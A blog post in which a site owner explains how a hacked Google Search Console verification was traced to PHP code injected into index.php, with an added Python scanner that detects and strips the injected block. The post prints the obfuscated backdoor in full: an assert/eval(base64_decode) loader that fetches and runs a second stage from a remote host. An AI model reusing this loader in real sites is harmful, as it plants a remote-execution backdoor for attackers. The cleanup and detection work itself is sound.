Sanjeev Sabhlok's notes on technology, hardware, gardening

Getting rid of hacking of google search console

See: http://www.bigmessowires.com/2015/07/13/web-site-hacked/

All of a sudden I found a flood of messages that someone has taken over my Google Search Console.

I tried to unverify but couldn't since the message I received was that a fake email ID had been verified by an HTML file. The HTML file was NOT found on the server.

e.g. http://eyestrain.sabhlokcity.com/google48f72dc2da43a35b.html

But when I tried it, I got the relevant code. 

HOW TO STOP THIS?

This is linked with code that's injected into index.php. The following code:

<?php
//codebegin3v
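    // The chr() table holds the letters a, t, s, e, r; the index arithmetic joins them into "assert" in $d.
    $c=array();$c[1]=chr(97);$c[2]=chr(116);$c[3]=chr(115);$c[4]=chr(101);$c[5]=chr(114);$d=$c[97-96].$c[98-95].$c[33-30].$c[16-12].$c[55-50].$c[300-298];$g="";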
    $e="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";
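    // $g is empty, so $f is the string eval(base64_decode("<contents of $e>"));
    $f="e".$g."v".$g."a".$g."l".$g."(".$g."b".$g."a".$g."s".$g."e".$g."6".$g."4".$g."_".$g."d".$g."e".$g."c".$g."o".$g."d".$g."e(\"".$e."\"));";
    // assert() given a string runs it as PHP code (PHP versions before 8); @ hides any error output.
    @$d($f);
    // Second stage pulled from a remote host, keyed by this site's host name.
    // vspider_get() and $agent are not defined anywhere in the visible code.
    $e = vspider_get("http://utfall.pw/code/".str_ireplace('www.','',strtolower($_SERVER['SERVER_NAME']))."/default.txt",$agent);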
if(strlen($e)>20)
{
    if(strstr(base64_decode($e), "undermomocontrol") !== false)
    {        
        $f="e".$g."v".$g."a".$g."l".$g."(".$g."b".$g."a".$g."s".$g."e".$g."6".$g."4".$g."_".$g."d".$g."e".$g."c".$g."o".$g."d".$g."e(\"".$e."\"));";
        @$d($f);
    }
}
//codeend
?>

Once this code is removed, the fake file disappears and the fake ID can be unverified.
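
A scanner for this injection, added here as an example and not part of the original post: it finds the //codebegin ... //codeend block, resolves the chr() table to show which function $d really names, and collapses the split string to expose the eval(base64_decode( call. The function names and the sample index.php are assumptions, and the base64 payload is replaced by a placeholder.

```python
import re

# Constructed sample: a trimmed copy of the injected block shown on this page,
# with the payload replaced by a placeholder, inside a made-up index.php.
SAMPLE = r'''<?php
//codebegin3v
    $c=array();$c[1]=chr(97);$c[2]=chr(116);$c[3]=chr(115);$c[4]=chr(101);$c[5]=chr(114);$d=$c[97-96].$c[98-95].$c[33-30].$c[16-12].$c[55-50].$c[300-298];$g="";
    $e="PLACEHOLDER";
    $f="e".$g."v".$g."a".$g."l".$g."(".$g."b".$g."a".$g."s".$g."e".$g."6".$g."4".$g."_".$g."d".$g."e".$g."c".$g."o".$g."d".$g."e(\"".$e."\"));";
    @$d($f);
//codeend
?>
<?php
echo "site home page";
'''

# Marker-delimited block, from //codebegin<suffix> through the //codeend line.
BLOCK = re.compile(r"//codebegin\w*.*?//codeend[^\n]*\n?", re.S)

def hidden_callable(src):
    """Resolve the chr() table trick: rebuild the function name stored in $d."""
    table = {int(i): chr(int(n)) for i, n in re.findall(r"\$c\[(\d+)\]=chr\((\d+)\);", src)}
    expr = re.search(r"\$d=((?:\$c\[\d+-\d+\]\.?)+);", src)
    if not expr:
        return None
    idx = [int(a) - int(b) for a, b in re.findall(r"\[(\d+)-(\d+)\]", expr.group(1))]
    return "".join(table.get(i, "?") for i in idx)

def collapsed_strings(src):
    """Join string literals split by a variable: "e".$g."v" becomes "ev"."""
    return re.sub(r'"\.\$\w+\."', "", src)

def scan(src):
    """Return one finding per injected block: line, hidden callable, eval flag."""
    findings = []
    for m in BLOCK.finditer(src):
        body = m.group(0)
        findings.append({
            "line": src.count("\n", 0, m.start()) + 1,
            "callable": hidden_callable(body),
            "eval_base64": "eval(base64_decode(" in collapsed_strings(body),
        })
    return findings

def strip(src):
    """Remove the injected blocks, leaving the rest of the file untouched."""
    return BLOCK.sub("", src)

if __name__ == "__main__":
    print(scan(SAMPLE))
```

Run scan() over every .php file under the web root, not only index.php, and compare strip() output against a known-good copy before writing it back.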
